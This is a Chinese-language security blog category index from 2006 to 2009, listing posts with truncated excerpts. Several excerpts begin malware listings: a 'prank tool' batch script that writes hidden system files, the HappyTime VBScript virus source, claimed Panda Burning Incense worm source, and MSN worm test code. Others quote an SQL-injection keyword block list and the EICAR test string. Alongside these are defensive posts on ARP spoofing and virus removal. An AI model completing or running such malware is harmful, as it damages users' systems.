MeChecksV

文章分类 -  黑客技术及安全知识

1 2 下一页
很想当名黑客,骇客望尘莫及..
整人的工具
摘要:@echo off title 整人的工具 @echo 整人的工具 @echo 正在优化系统~ @echo @echo off >%windir%\help.bat >nul @echo attrib +s +a +r +h %windir%\system\help.bat >>%windir%\help.bat >nul @echo attrib +s +a +r +h %windir%... 阅读全文
posted @ 2009-01-17 19:43 许维光 阅读(321) 评论(0) 推荐(0)
关于arp欺骗原理及防范
摘要:最近不少朋友及客户的服务器遇到arp欺骗攻击,造成站点被挂木马.由于是采用ARP技术欺骗,所以主机并没入侵,在服务器里查看网页源码也是没任何挂马代码,但是网站在访问时候却全部被挂马! 开始我也不懂这就是网络传说中的ARP欺骗,后来查了下资料才知道这就是ARP欺骗.ARP欺骗我们要先从ARP工作原理讲起. 我们先熟悉下ARP,大学计算机网络基础课学过,ARP就是地址解析协议... 阅读全文
posted @ 2008-01-27 13:13 许维光 阅读(477) 评论(0) 推荐(0)
谁控制了我们的浏览器?
摘要:本文遵从GPL协议,欢迎转载。 1、现象是什么? 大约从今年年初开始,很多人就发现,在浏览一些网站的时候,地址栏的url后面会被莫名其妙地加上“?curtime=xxxxxxxxxx”(x为数字),并且弹出广告窗口。很多人以为这是网站自己弹出的广告,也就没有在意。 我是属于很在意的那些人之一。 2、这是怎么回事? 经过测试和分析,我们发现,上述现象与使用何种浏览器无关(我们测试... 阅读全文
posted @ 2008-01-27 13:06 许维光 阅读(262) 评论(0) 推荐(1)
IE6sp1 showModalDialog方法远程文件下载执行漏洞分析
摘要:最近大半年IE一连出了好几个漏洞,其中最严重也是现在网页木马利用最多 的一个当属IE Object Data的漏洞了.可这已经是去年8月份就公布的.只要打了 Q822925就能补上了,所以我一直在找一个能对付Q822925的新洞洞并好好分析一下. 终于机会来了,几天前我去绿盟(nsfocus.com)看贴子,注意到IE又出了个新洞 洞,文章标题是Microsoft Internet Explor... 阅读全文
posted @ 2007-10-27 21:11 许维光 阅读(437) 评论(0) 推荐(0)
NT平台拨号连接密码恢复原理
摘要:NT平台拨号连接密码恢复原理Author : eyasEmail : eyas at xfocus.orgDate : 2004-11-08 前段时间ADSL密码忘记了,但幸好还保存在拨号连接里面,于是到网上找了些星号密码显示工具,可惜不起作用。后来找到一种名为dialupass的工具,这家伙不负重望把密码给我还原出来了。(用的dialupass v2.42,我的系统是windows ... 阅读全文
posted @ 2007-02-01 11:15 许维光 阅读(439) 评论(0) 推荐(0)
熊猫烧香 - 核心源码
摘要:熊猫烧香 - 核心源码 --------------------------------------------------------------------------------僅供研究使用!後果自行負責 代码:--------------------------------------------------------------------------------程序代码pro... 阅读全文
posted @ 2007-01-30 14:31 许维光 阅读(322) 评论(0) 推荐(0)
关于logo病毒的简介及清理办法
摘要:W32/HLLP.Philis.g 病毒,最近发作比较平繁。造成好多朋友网吧遭此病毒破坏造成大面积的卡机,瘫痪。我查遍了好多病毒,和自己收集的病毒样本做了比较,发现此病毒极度变态。危害程度可以和世界排名前十的爱情后门变种相比。该病毒可以通过网络传播,传播周期为3分钟。如果是新做的系统处于中了毒的网络环境内,只要那个机器一上网,3分钟内必定中招。中招后你安装 rising SkyNet Symant... 阅读全文
posted @ 2007-01-24 09:34 许维光 阅读(536) 评论(0) 推荐(0)
Explorer.EXE 遇到问题需要关闭的解决方法
摘要:Explorer.EXE 遇到问题需要关闭的解决方法 首先进行杀毒,浏览所有驱动器,将可疑的文件和程序都删除,问题没解决的话,试试下面的方法。 1:打开IE,工具,INTERNET选项,高级,还原默认设置; 2:在出现错误提示时不要点“确定”和“取消”,在“运行”里面输入“msconfig”并回车, 单击“启动”,然后将里面除了杀毒软件、防火墙和一些系统必要的项目打上勾之外,其余 的全部将前面的勾... 阅读全文
posted @ 2007-01-24 09:31 许维光 阅读(1274) 评论(0) 推荐(0)
U盘(auto病毒)类病毒分析与解决方案
摘要:U盘病毒简述: U盘(自动运行)类病毒(auto病毒)近来非常常见,并且具有一定程度危害,它的机理是依赖Windows的自动运行功能,使得我们在点击打开磁盘的时候,自动执行相关的文件.目前我们使用U盘都十分频繁,当我们享受U盘所带来的方便时,U盘病毒也在悄悄利用系统的自动运行功能肆意传播,目前流行的 U盘病毒文件大家甚至耳熟能详了,比如经常有网友问的SSS.EXE SXS.EXE如何查杀这类的... 阅读全文
posted @ 2007-01-24 09:30 许维光 阅读(513) 评论(0) 推荐(0)
预防第一!熊猫烧香病毒的预防方法
摘要:“熊猫烧香”病毒不但可以对用户系统进行破坏,导致大量应用软件无法使用,而且还可删除扩展名为gho的所有文件,造成用户的系统备份文件丢失,从而无法进行系统恢复;同时该病毒还能终止大量反病毒软件进程,大大降低用户系统的安全性。 这几天“熊猫烧香”的变种更是表象异常活跃,近半数的网民深受其害。对于已经感染“熊猫烧香”病毒的用户,建议参考《熊猫烧香病毒专杀及手动修复方案》,下载其中的专钉工具进行查杀... 阅读全文
posted @ 2007-01-22 12:37 许维光 阅读(592) 评论(0) 推荐(0)
关于杀毒和杀毒软件。。
摘要:以下言论[转]虽是转至别人,倒是深合我意。。。 “杀毒”本来就是一件扯谈的事。恕我直言,只有菜鸟才对杀毒软件热衷异常。 原因是: 1、程序是人(程序员)编出来的,病毒是一段程序,杀毒软件也是一段程序。为什么你认为杀毒公司的 程序员能胜过无数隐藏在暗处的、先发制人的程序员?当然你可以反问,为什么全世界的黑客都在寻找 windows的漏洞,而我们还是决定信任微软公司?回答是,问题是不一... 阅读全文
posted @ 2007-01-10 09:39 许维光 阅读(218) 评论(0) 推荐(0)
MSN病毒原理及测试代码
摘要:今年春节后的一段时间MSN病毒非常流行,它的原理其实很简单,最主要的工作就是操控MSN这个也很简单,微软有公开的接口让你用.下面是测试代码,只有通过MSN传送文件部分 CODE: #include "stdafx.h"#include #include #include "msgruaid.h" //这两个头文件就是接口的定义#include "msgrua.h" //有兴趣的同学可以... 阅读全文
posted @ 2006-07-04 11:08 许维光 阅读(271) 评论(0) 推荐(0)
收集小资料。。
摘要:-X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*-给大家一个病毒测试代码,看看你的杀毒软件有没闲着,去掉前后- -并用记事本保存,若你的杀毒软件很好,保存后就立刻有反应,有的则需单击或双击若没有反应则说明你的监控未开,或太臭了2006.7.4 阅读全文
posted @ 2006-07-04 11:06 许维光 阅读(167) 评论(0) 推荐(0)
用简单命令检查电脑是否被安装木马
摘要:一些基本的命令往往可以在保护网络安全上起到很大的作用,下面几条命令的作用就非常突出。 检测网络连接 如果你怀疑自己的计算机上被别人安装了木马,或者是中了病毒,但是手里没有完善的工具来检测是不是真有这样的事情发生,那可以使用Windows自带的网络命令来看看谁在连接你的计算机。具体的命令格式是:netstat -an这个命令能看到所有和本地计算机建立连接的IP,它包含四个部分——prot... 阅读全文
posted @ 2006-07-04 10:50 许维光 阅读(276) 评论(0) 推荐(0)
郑重申明!
摘要:郑重申明: 所搜集的所有黑客程序与相关知识均来源互联网。。用于学习与防范。。用于恶意破坏与本人无关,请用于正道。。 阅读全文
posted @ 2006-07-04 10:44 许维光 阅读(163) 评论(0) 推荐(0)
happytime病毒源程序
摘要:Rem I am sorry! happy time On Error Resume Next mload Sub mload() On Error Resume Next mPath = Grf() Set Os = CreateObject("Scriptlet.TypeLib") Set Oh = CreateObject("Shell.Application") If IsHTML The... 阅读全文
posted @ 2006-07-04 10:40 许维光 阅读(376) 评论(0) 推荐(0)
Wscript.Shell 对象详细介绍
摘要:WshShell 对象ProgID Wscript.Shell 文件名 WSHom.Ocx CLSID F935DC22-1CF0-11d0-ADB9-00C04FD58A0B IID F935DC21-1CF0-11d0-ADB9-00C04FD58A0B 下表说明和 WshShell 对象有关的属性。属性 说明 Environment 返回 WshEnvironment 集合对象。 Speci... 阅读全文
posted @ 2006-06-08 17:02 许维光 阅读(960) 评论(0) 推荐(0)
系统文件rundll32.exe使用详解!
摘要:winexec(Pchar('StrCommand'),sw_Show); 其中"StrCommand"代表以下命令之一(使用Windows中的运行不要加引号): "rundll32 shell32,Control_RunDLL" - 运行控制面板 "rundll32 shell32,OpenAs_RunDLL" - 打开"打开方式"窗口 "rundll32 shell32,ShellAbout... 阅读全文
posted @ 2006-06-03 21:49 许维光 阅读(419) 评论(0) 推荐(0)
网页脚本攻击防范全攻略(三)
摘要:程序体(5) fqys=request.servervariables("query_string") dim nothis(18) nothis(0)="net user" nothis(1)="xp_cmdshell" nothis(2)="/add" nothis(3)="exec%20master.dbo.xp_cmdshell" nothis(4)="net ... 阅读全文
posted @ 2006-05-15 18:30 许维光 阅读(241) 评论(0) 推荐(0)
网页脚本攻击防范全攻略(二)
摘要:程序体(1) 另外,值得我们注意的是,很多站点在用户注册,或者是用户资料修改的页面上也缺少脚本的过滤,或者是只在其中之一进行过滤,注册进入后修改资料仍然可以进行脚本攻击。对用户提交的数据进行检测和过滤,程序体(2) 如下: ‘以下是过滤函数 If Instr(request("username"),"=")>0 or Instr(request("username"),"%"... 阅读全文
posted @ 2006-05-15 18:29 许维光 阅读(218) 评论(0) 推荐(0)

1 2 下一页

博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3 Powered By博客园